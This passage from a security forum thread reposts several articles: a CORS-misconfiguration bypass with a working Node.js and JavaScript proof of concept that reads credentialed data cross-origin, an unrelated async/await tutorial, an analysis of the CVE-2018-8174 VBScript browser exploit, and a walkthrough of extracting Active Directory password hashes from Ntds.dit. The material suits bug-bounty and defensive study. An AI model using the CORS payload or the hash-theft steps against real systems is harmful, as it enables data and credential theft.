*.xxe.sh followed by the characters . - a-z A-Z 0-9 won’t be trusted. What about an origin with a space after the string “xxe.sh”? We see that it’s trusted, however, such a domain isn’t supported in any normal browser. Since the regex matches against alphanumeric ASCII characters and . -, special characters after “xxe.sh” would be trusted: Such a domain would be supported in a modern, common browser: Safari. Exploitation: Pre-Requisites: A domain with a wildcard DNS record pointing it to your box. NodeJS Like most browsers, Apache and Nginx (right out of the box) also don’t like these special characters, so it’s much easier to serve HTML and Javascript with NodeJS. [+] serve.js var http = require('http'); var url = require('url'); var fs = require('fs'); var port = 80 http.createServer(function(req, res) { if (req.url == '/cors-poc') { fs.readFile('cors.html', function(err, data) { res.writeHead(200, {'Content-Type':'text/html'}); res.write(data); res.end(); }); } else { res.writeHead(200, {'Content-Type':'text/html'}); res.write('never gonna give you up...'); res.end(); } }).listen(port, '0.0.0.0'); console.log(`Serving on port ${port}`); In the same directory, save the following: [+] cors.html <!DOCTYPE html> <html> <head><title>CORS</title></head> <body onload="cors();"> <center> cors proof-of-concept:<br><br> <textarea rows="10" cols="60" id="pwnz"> </textarea><br> </div> <script> function cors() { var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("pwnz").innerHTML = this.responseText; } }; xhttp.open("GET", "http://x.xxe.sh/api/secret-data/", true); xhttp.withCredentials = true; xhttp.send(); } </script> Start the NodeJS server by running the following command: node serve.js & Like stated before, since the regular expression matches against alphanumeric ASCII characters and . -, special characters after “xxe.sh” would be trusted: So if we open Safari and visit http://x.xxe.sh{.<your-domain>/cors-poc, we will see that we were able to successfully steal data from the vulnerable endpoint. Edit: It was brought to my attention that the _ character (in subdomains) is not only supported in Safari, but also in Chrome and Firefox! Therefore http://x.xxe.sh_.<your-domain>/cors-poc would send valid origin from the most common browsers! Thanks Prakash, you rock! Practical Testing With these special characters now in mind, figuring out which Origins are reflected in the Access-Control-Allow-Origin header can be a tedious, time-consuming task: Introducing TheftFuzzer: To save time and to become more efficient, I decided to code a tool to fuzz CORS configurations for allowed origins. It’s written in Python and it generates a bunch of different permutations for possible CORS bypasses. It can be found on my Github here. If you have any ideas for improvements to the tool, feel free to ping me or make a pull request! Outro I hope this post has been informative and that you’ve learned from it! Go exploit those CORS configurations and earn some bounties 😝 Happy Hunting! Corben Leo https://twitter.com/hacker_ https://hackerone.com/cdl https://bugcrowd.com/c https://github.com/sxcurity Sursa: https://www.sxcurity.pro/advanced-cors-techniques/
      • 2
      • Upvote
  23. JavaScript async/await: The Good Part, Pitfalls and How to Use The async/await introduced by ES7 is a fantastic improvement in asynchronous programming with JavaScript. It provided an option of using synchronous style code to access resoruces asynchronously, without blocking the main thread. However it is a bit tricky to use it well. In this article we will explore async/await from different perspectives, and will show how to use them correctly and effectively. The good part in async/await The most important benefit async/await brought to us is the synchronous programming style. Let’s see an example. // async/await async getBooksByAuthorWithAwait(authorId) { const books = await bookModel.fetchAll(); return books.filter(b => b.authorId === authorId); } // promise getBooksByAuthorWithPromise(authorId) { return bookModel.fetchAll() .then(books => books.filter(b => b.authorId === authorId)); } It is obvious that the async/awaitversion is way easier understanding than the promise version. If you ignore the await keyword, the code just looks like any other synchronous languages such as Python. And the sweet spot is not only readability. async/await has native browser support. As of today, all the mainstream browsers have full support to async functions. All mainstream browsers support Async functions. (Source: https://caniuse.com/) Native support means you don’t have to transpile the code. More importantly, it facilitates debugging. When you set a breakpoint at the function entry point and step over the await line, you will see the debugger halt for a short while while bookModel.fetchAll() doing its job, then it moves to the next .filter line! This is much easier than the promise case, in which you have to setup another breakpoint on the .filter line. Debugging async function. Debugger will wait at the await line and move to the next on resolved. Another less obvious benefit is the async keyword. It declares that the getBooksByAuthorWithAwait() function return value is guaranteed to be a promise, so that callers can call getBooksByAuthorWithAwait().then(...) or await getBooksByAuthorWithAwait() safely. Think about this case (bad practice!): getBooksByAuthorWithPromise(authorId) { if (!authorId) { return null; } return bookModel.fetchAll() .then(books => books.filter(b => b.authorId === authorId)); } In above code, getBooksByAuthorWithPromise may return a promise (normal case) or a null value (exceptional case), in which case caller cannot call .then() safely. With async declaration, it becomes impossible for this kind of code. Async/await Could Be Misleading Some articles compare async/await with Promise and claim it is the next generation in the evolution of JavaScript asynchronous programming, which I respectfully disagree. Async/await IS an improvement, but it is no more than a syntactic sugar, which will not change our programming style completely. Essentially, async functions are still promises. You have to understand promises before you can use async functions correctly, and even worse, most of the time you need to use promises along with async functions. Consider the getBooksByAuthorWithAwait() and getBooksByAuthorWithPromises() functions in above example. Note that they are not only identical functionally, they also have exactly the same interface! This means getBooksByAuthorWithAwait() will return a promise if you call it directly. Well, this is not necessarily a bad thing. Only the name await gives people a feeling that “Oh great this can convert asynchronous functions to synchronous functions” which is actually wrong. Async/await Pitfalls So what mistakes may be made when using async/await? Here are some common ones. Too Sequential Although await can make your code look like synchronous, keep in mind that they are still asynchronous and care must be taken to avoid being too sequential. async getBooksAndAuthor(authorId) { const books = await bookModel.fetchAll(); const author = await authorModel.fetch(authorId); return { author, books: books.filter(book => book.authorId === authorId), }; } This code looks logically correct. However this is wrong. await bookModel.fetchAll() will wait until fetchAll() returns. Then await authorModel.fetch(authorId) will be called. Notice that authorModel.fetch(authorId) does not depend on the result of bookModel.fetchAll() and in fact they can be called in parallel! However by using await here these two calls become sequential and the total execution time will be much longer than the parallel version. Here is the correct way: async getBooksAndAuthor(authorId) { const bookPromise = bookModel.fetchAll(); const authorPromise = authorModel.fetch(authorId); const book = await bookPromise; const author = await authorPromise; return { author, books: books.filter(book => book.authorId === authorId), }; } Or even worse, if you want to fetch a list of items one by one, you have to rely on promises: async getAuthors(authorIds) { // WRONG, this will cause sequential calls // const authors = _.map( // authorIds, // id => await authorModel.fetch(id)); // CORRECT const promises = _.map(authorIds, id => authorModel.fetch(id)); const authors = await Promise.all(promises); } In short, you still need to think about the workflows asynchronously, then try to write code synchronously with await. In complicated workflow it might be easier to use promises directly. Error Handling With promises, an async function have two possible return values: resolved value, and rejected value. And we can use .then() for normal case and .catch() for exceptional case. However with async/await error handling could be tricky. try…catch The most standard (and my recommended) way is to use try...catch statement. When await a call, any rejected value will be thrown as an exception. Here is an example: class BookModel { fetchAll() { return new Promise((resolve, reject) => { window.setTimeout(() => { reject({'error': 400}) }, 1000); }); } } // async/await async getBooksByAuthorWithAwait(authorId) { try { const books = await bookModel.fetchAll(); } catch (error) { console.log(error); // { "error": 400 } } The catched error is exactly the rejected value. After we caught the exception, we have several ways to deal with it: Handle the exception, and return a normal value. (Not using any return statement in the catch block is equivalent to using return undefined; and is a normal value as well.) Throw it, if you want the caller to handle it. You can either throw the plain error object directly like throw error;, which allows you to use this async getBooksByAuthorWithAwait() function in a promise chain (i.e. you can still call it like getBooksByAuthorWithAwait().then(...).catch(error => ...)); Or you can wrap the error with Error object, like throw new Error(error) , which will give the full stack trace when this error is displayed in the console. Reject it, like return Promise.reject(error) . This is equivalent to throw error so it is not recommended. The benefits of using try...catch are: Simple, traditional. As long as you have experience of other languages such as Java or C++, you won’t have any difficulty understanding this. You can still wrap multiple await calls in a single try...catch block to handle errors in one place, if per-step error handling is not necessary. There is also one flaw in this approach. Since try...catch will catch every exception in the block, some other exceptions which not usually caught by promises will be caught. Think about this example: class BookModel { fetchAll() { cb(); // note `cb` is undefined and will result an exception return fetch('/books'); } } try { bookModel.fetchAll(); } catch(error) { console.log(error); // This will print "cb is not defined" } Run this code an you will get an error ReferenceError: cb is not defined in the console, in black color. The error was output by console.log() but not the JavaScript itself. Sometimes this could be fatal: If BookModel is enclosed deeply in a series of function calls and one of the call swallows the error, then it will be extremely hard to find an undefined error like this. Making functions return both value Another way for error handling is inspired by Go language. It allows async function to return both the error and the result. See this blog post for the detail: How to write async await without try-catch blocks in Javascript ES7 Async/await allows us as developers to write asynchronous JS code that look synchronous. In current JS version we…blog.grossman.io In short, you can use async function like this: [err, user] = await to(UserModel.findById(1)); Personally I don’t like this approach since it brings Go style into JavaScript which feels unnatural, but in some cases this might be quite useful. Using .catch The final approach we will introduce here is to continue using .catch(). Recall the functionality of await: It will wait for a promise to complete its job. Also please recall that promise.catch() will return a promise too! So we can write error handling like this: // books === undefined if error happens, // since nothing returned in the catch statement let books = await bookModel.fetchAll() .catch((error) => { console.log(error); }); There are two minor issues in this approach: It is a mixture of promises and async functions. You still need to understand how promises work to read it. Error handling comes before normal path, which is not intuitive. Conclusion The async/await keywords introduced by ES7 is definitely an improvement to JavaScript asynchronous programming. It can make code easier to read and debug. However in order to use them correctly, one must completely understand promises, since they are no more than syntactic sugar, and the underlying technique is still promises. Hope this post can give you some ideas about async/await themselves, and can help you prevent some common mistakes. Thanks for your reading, and please clap for me if you like this post. Charlee Li Full stack engineer & Tech writer @ Toronto. Sursa: https://hackernoon.com/javascript-async-await-the-good-part-pitfalls-and-how-to-use-9b759ca21cda
      • 2
      • Upvote
  24. Dissecting modern browser exploit: case study of CVE-2018–8174 When this exploit first emerged in the turn of April and May it spiked my interest, since despite heavy obfuscation, the code structure seemed well organized and the vulnerability exploitation code small enough to make analysis simpler. I downloaded POC from github and decided it would be a good candidate for taking a look at under the hood. At that time two analyses were already published, first from 360 and second from Kaspersky. Both of them helped me understand how it worked, but were not enough to deeply understand every aspect of the exploit. That’s why I’ve decided to analyze it on my own and share my findings. Preprocessing First in order to remove integer obfuscation I used regex substitution in python script: As to obfuscated names, I renamed them progressively during analysis. This analysis is best to be read with source code to which link is at the end. Use after free Vulnerability occurs, when object is terminated and custom defined function Class_Terminate() is called. In this function reference to the object being freed is saved in UafArray. From now on UafArray(i) refers to the deleted object. Also notice the last line in Class_Terminate(). When we copy ClassTerminate object to UafArray its reference counter is increased. To balance it out we free it again by assigning other value to FreedObjectArray. Without this, object's memory wouldn't be freed despite calling Class_Terminate on it and next object wouldn't be allocated in its place. Creating and deleting new objects is repeated 7 times in a loop, after that a new object of class ReuseClass is created. It's allocated in the same memory that was previously occupied by the 7 ClassTerminate instances. To better understand that, here is a simple WinDbg script that tracks all those allocations: bp vbscript!VBScriptClass::TerminateClass ".printf \"Class %mu at %x, terminate called\\n\", poi(@ecx + 0x24), @ecx; g"; bp vbscript!VBScriptClass::Release ".printf \"Class %mu at: %x ref counter, release called: %d\\n\", poi(@eax + 0x24), @ecx, poi(@eax + 0x4); g"; bp vbscript!VBScriptClass::Create+0x55 ".printf \"Class %mu created at %x\\n\", poi(@esi + 0x24), @esi; g"; Here is allocation log from UafTrigger function: Class EmptyClass created at 3a7d90 Class EmptyClass created at 3a7dc8 ... Class ReuseClass created at 22601a0 Class ReuseClass created at 22601d8 Class ReuseClass created at 2260210 ... Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA created at 22605c8 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 2 Class ClassTerminateA at: 70541748 ref counter, release called: 1 Class ClassTerminateA at 22605c8, terminate called Class ClassTerminateA at: 70541748 ref counter, release called: 5 Class ClassTerminateA at: 70541748 ref counter, release called: 4 Class ClassTerminateA at: 70541748 ref counter, release called: 3 Class ClassTerminateA at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 22605c8 ... Class ClassTerminateB created at 2260600 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 2 Class ClassTerminateB at: 70541748 ref counter, release called: 1 Class ClassTerminateB at 2260600, terminate called Class ClassTerminateB at: 70541748 ref counter, release called: 5 Class ClassTerminateB at: 70541748 ref counter, release called: 4 Class ClassTerminateB at: 70541748 ref counter, release called: 3 Class ClassTerminateB at: 70541748 ref counter, release called: 2 ... Class ReuseClass created at 2260600 We can immediately see that ReuseClass is indeed allocated in the same memory that was assigned to 7 previous instances of ClassTerminate This is repeated twice. We end up with two objects referenced by UafArrays. None of those references is reflected in object's reference counter. In this log we can also notice that even after Class_Terminate was called there are some object manipulations that change its reference counter. That's why if we didn't balance this counter out in Class_Terminate we would get something like this: Class ClassTerminateA created at 2240708 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 2 Class ClassTerminateA at: 6c161748 ref counter, release called: 1 Class ClassTerminateA at 2240708, terminate called Class ClassTerminateA at: 6c161748 ref counter, release called: 5 Class ClassTerminateA at: 6c161748 ref counter, release called: 4 Class ClassTerminateA at: 6c161748 ref counter, release called: 3 Class ReuseClass created at 2240740 Different allocation addresses. Exploit would fail to create use after free condition. Type Confusion Having created those two objects with 7 uncounted references to each, we established read arbitrary memory primitive. There are two similar classes ReuseClass and FakeReuseClass. By replacing first class with second one a type confusion on mem member occurs. In SetProp function ReuseClass.mem is saved and Default Property Get of class ReplacingClass_* is called, result of that call will be placed in ReuseClass.mem. Inside that getter UafArray is emptied by assigning 0 to each element. This causes VBScriptClass::Release to be called on ReuseClass object that is referenced by UafArray. It turns out that at this stage of execution ReuseClass object has reference counter equal to 7, and since we call Release 7 times, this object gets freed. And because those references came from use after free situation they are not accounted for in reference counter. In place of ReuseClass a new object of FakeReuseClass is allocated. Now to get its reference counter equal to 7, as was the case with ReuseClass we assign it 7 times to UafArray. Here is memory layout before and after this operation. After this is done the getter function will return a value that will be assigned to the old ReuseClass::mem variable. As can be seen on memory dumps, old value was placed 0xC bytes before the new one. Objects were specially crafted to cause this situation, for example by selecting proper length for function names. Now value written to ReuseClass::mem will overwrite FakeReuseClass::mem header, causing type confusion situation. Last line assigned string FakeArrayString to objectImitatingArray.mem. Header now has value of VT_BSTR Q=CDbl("174088534690791e-324") ' db 0, 0, 0, 0, 0Ch, 20h, 0, 0 This value overwrote objectImitatingArray.mem type to VT_ARRAY | VT_VARIANT and now pointer to string will be interpreted as pointer to SAFEARRAY structure. Arbitrary memory read The result is that we end up with two objects of FakeReuseClass. One of them has a mem member array that is addressing whole user-space (0x00000000 - 0x7fffffff) and the other has a member of type VT_I4 (4 byte integer) with pointer to an empty 16 byte string. Using the second object, a pointer to string is leaked: some_memory=resueObjectB_int.mem It will be later used as an address in memory that is writable. Next step is to leak any address inside vbscript.dll. Here a very neat trick is used. First we define that on error, script should just continue regular execution. Then there is an attempt to assign EmptySub to a variable. This is not possible in VBS but still a value is pushed on the stack before error is generated. Next instruction should assign null to a variable, which it does, by simply changing type of last value from the stack to VT_NULL. Now emptySub_addr_placeholder holds pointer to the function but with type set to VT_NULL. Then this value is written to our writable memory, its type is changed to VT_I4 and it is read back as integer. If we check the content of this value it turns out to be a pointer to CScriptEntryPoint and first member is vftable pointing inside vbscript.dll To read a value from arbitrary address, in this case pointer returned from LeakVBAddr, the following functions are used: Read is acheived by first writing address+4 to a writable memory, then type is changed to VT_BSTR. Now address+4 is treated as a pointer to BSTR. If we call LenB on address+4 it will return value pointed to by address. Why? Because of how BSTR is defined, unicode value is preceded by its length, and that length is returned by LenB. Now when address inside vbscript.dll was leaked, and having established arbitrary memory read it is a matter of properly traversing PE header to obtains all needed addresses. Details of doing that won’t be explained here. This article explains PE file in great details. Triggering code execution Final code execution is achived in two steps. First a chain of two calls is built, but it’s not a ROP chain. NtContinue is provided with CONTEXT structure that sets EIP to VirtualProtect address, and ESP to structure containing VirtualProtect's parameters. First address of shellcode is obtained using previously described technique of changing variable type to VT_I4 and reading the pointer. Next a structure for VirtualProtect is built, that contains all necessary parameters, like shellcode address, size and RWX protections. It also has space that will be used by stack operations inside VirtualProtect. After that a CONTEXT structure is built, with EIP set to VirtualProtect and ESP to its parameters. This structure also has as first value a pointer to NtContinue address repeated 4 times. Final step before starting this chain is to save the structure as string in memory. This function is then used to start the chain. First it changes type of the saved structure to 0x4D and then sets its value to 0, this causes VAR::Clear to be called. And a dynamic view from debugger Although it might seem complicated this chain of execution is very simple. Just two steps. Invoke NtContinue with CONTEXT structure pointing to VirtualProtect. Then VirtualProtect will disable DEP on memory page that contains the shellcode and after that it will return into the shellcode. Conclusion CVE-2018–8174 is a good example of chaining few use after free and type confusion conditions to achieve code execution in very clever way. It’s a great example to learn from and understand inner workings of such exploits. Useful links Commented exploit code Kaspersky’s root cause analysis 360’s analysis Another Kaspersky’s anlysis CVE-2014–6332 analysis by Trend Micro Sursa: https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890
      • 1
      • Upvote
  25. Extracting Password Hashes from the Ntds.dit File March 27, 2017 Jeff Warren Comments 0 Comment AD Attack #3 – Ntds.dit Extraction With so much attention paid to detecting credential-based attacks such as Pass-the-Hash (PtH) and Pass-the-Ticket (PtT), other more serious and effective attacks are often overlooked. One such attack is focused on exfiltrating the Ntds.dit file from Active Directory Domain Controllers. Let’s take a look at what this threat entails and how it can be performed. Then we can review some mitigating controls to be sure you are protecting your own environment from such attacks. What is the Ntds.dit File? The Ntds.dit file is a database that stores Active Directory data, including information about user objects, groups, and group membership. It includes the password hashes for all users in the domain. By extracting these hashes, it is possible to use tools such as Mimikatz to perform pass-the-hash attacks, or tools like Hashcat to crack these passwords. The extraction and cracking of these passwords can be performed offline, so they will be undetectable. Once an attacker has extracted these hashes, they are able to act as any user on the domain, including Domain Administrators. Performing an Attack on the Ntds.dit File In order to retrieve password hashes from the Ntds.dit, the first step is getting a copy of the file. This isn’t as straightforward as it sounds, as this file is constantly in use by AD and locked. If you try to simply copy the file, you will see an error message similar to: There are several ways around this using capabilities built into Windows, or with PowerShell libraries. These approaches include: Use Volume Shadow Copies via the VSSAdmin command Leverage the NTDSUtil diagnostic tool available as part of Active Directory Use the PowerSploit penetration testing PowerShell modules Leverage snapshots if your Domain Controllers are running as virtual machines In this post, I’ll quickly walk you through two of these approaches: VSSAdmin and PowerSploit’s NinjaCopy. Using VSSAdmin to Steal the Ntds.dit File Step 1 – Create a Volume Shadow Copy Step 2 – Retrieve Ntds.dit file from Volume Shadow Copy Step 3 – Copy SYSTEM file from registry or Volume Shadow Copy. This contains the Boot Key that will be needed to decrypt the Ntds.dit file later. Step 4 – Delete your tracks Using PowerSploit NinjaCopy to Steal the Ntds.dit File PowerSploit is a PowerShell penetration testing framework that contains various capabilities that can be used for exploitation of Active Directory. One module is Invoke-NinjaCopy, which copies a file from an NTFS-partitioned volume by reading the raw volume. This approach is another way to access files that are locked by Active Directory without alerting any monitoring systems. Extracting Password Hashes Regardless of which approach was used to retrieve the Ntds.dit file, the next step is to extract password information from the database. As mentioned earlier, the value of this attack is that once you have the files necessary, the rest of the attack can be performed offline to avoid detection. DSInternals provides a PowerShell module that can be used for interacting with the Ntds.dit file, including extraction of password hashes. Once you have extracted the password hashes from the Ntds.dit file, you are able to leverage tools like Mimikatz to perform pass-the-hash (PtH) attacks. Furthermore, you can use tools like Hashcat to crack these passwords and obtain their clear text values. Once you have the credentials, there are no limitations to what you can do with them. How to Protect the Ntds.dit File The best way to stay protected against this attack is to limit the number of users who can log onto Domain Controllers, including commonly protected groups such as Domain and Enterprise Admins, but also Print Operators, Server Operators, and Account Operators. These groups should be limited, monitored for changes, and frequently recertified. In addition, leveraging monitoring software to alert on and prevent users from retrieving files off Volume Shadow Copies will be beneficial to reduce the attack surface. Here are the other blogs in the series: AD Attack #1 – Performing Domain Reconnaissance (PowerShell) Read Now AD Attack #2 – Local Admin Mapping (Bloodhound) Read Now AD Attack #4 – Stealing Passwords from Memory (Mimikatz) Read Now To watch the AD Attacks webinar, please click here. Jeff Warren Jeff Warren is STEALTHbits’ Vice President of Product Management. Jeff has held multiple roles within the Product Management group since joining the organization in 2010, initially building STEALTHbits’ SharePoint management offerings before shifting focus to the organization’s Data Access Governance solution portfolio as a whole. Before joining STEALTHbits, Jeff was a Software Engineer at Wall Street Network, a solutions provider specializing in GIS software and custom SharePoint development. With deep knowledge and experience in technology, product and project management, Jeff and his teams are responsible for designing and delivering STEALTHbits’ high quality, innovative solutions. Jeff holds a Bachelor of Science degree in Information Systems from the University of Delaware. Sursa: https://blog.stealthbits.com/extracting-password-hashes-from-the-ntds-dit-file/
      • 2
      • Upvote
×
×
  • Create New...